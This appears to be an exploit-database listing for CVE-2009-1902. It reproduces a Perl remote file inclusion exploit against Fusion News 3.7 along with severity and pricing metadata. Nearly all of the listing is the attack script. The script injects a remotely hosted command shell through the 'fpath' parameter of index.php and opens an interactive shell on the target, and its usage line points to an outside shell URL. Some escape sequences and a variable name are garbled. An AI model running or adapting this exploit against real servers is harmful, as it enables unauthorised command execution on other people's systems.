fusionnews 3,7 Remote File Inclusion
CVE
Category
Price
Severity
CVE-2009-1902
CWE-94
$500
High
Author
Risk
Exploitation Type
Date
Anonymous
High
Remote
2006-08-25
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080129 #!/usr/bin/perl
###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: OUTLAW #
# < www.Aria-security.net > #
# Gr33t to: A.u.r.a & HessamX & Cl0wn & DrtRp #
# Special Thanx To All Aria-Security Users #
###########################################################################################
use LWP::UserAgent;
print "n === Fusion News v3.7 Remote File Inclusionn";
print "n === Discovered by OutLaw .n";
print "n === www.Aria-Security.Netn";
$bPath = $ARGV[0];
$cmdo = $ARGV[1];
$bcmd = $ARGV[2];
if($bPath!~/http:/// || $cmdo!~/http:/// || !$bcmd){usage()}
while()
{
print "[Shell] $";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$bpath.'index.php?fpath='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "n Could not connect !n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[n]/[ê]/;
if (!$cmd) {print "nPlease type a Commandnn"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request failed!/)
{print "n Could Not Connect to cmd Hostn";exit}
elsif ($return =~/^<b>Fatal.error/) {print "n Invalid Commandn"}
if($return =~ /(.*)/)
{
$freturn = $1;
$freturn=~ tr/[ê]/[n]/;
print "rn$freturnnr";
last;
}
else {print "[Shell] $";}}}last;
sub usage()
{
print " Usage : fusion.pl [host] [cmd shell location] [cmd shell variable]n";
print " Example : fusion.pl http://fusionnews.com http://www.shell.com/cmd.txt cmdn";
exit();
}
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum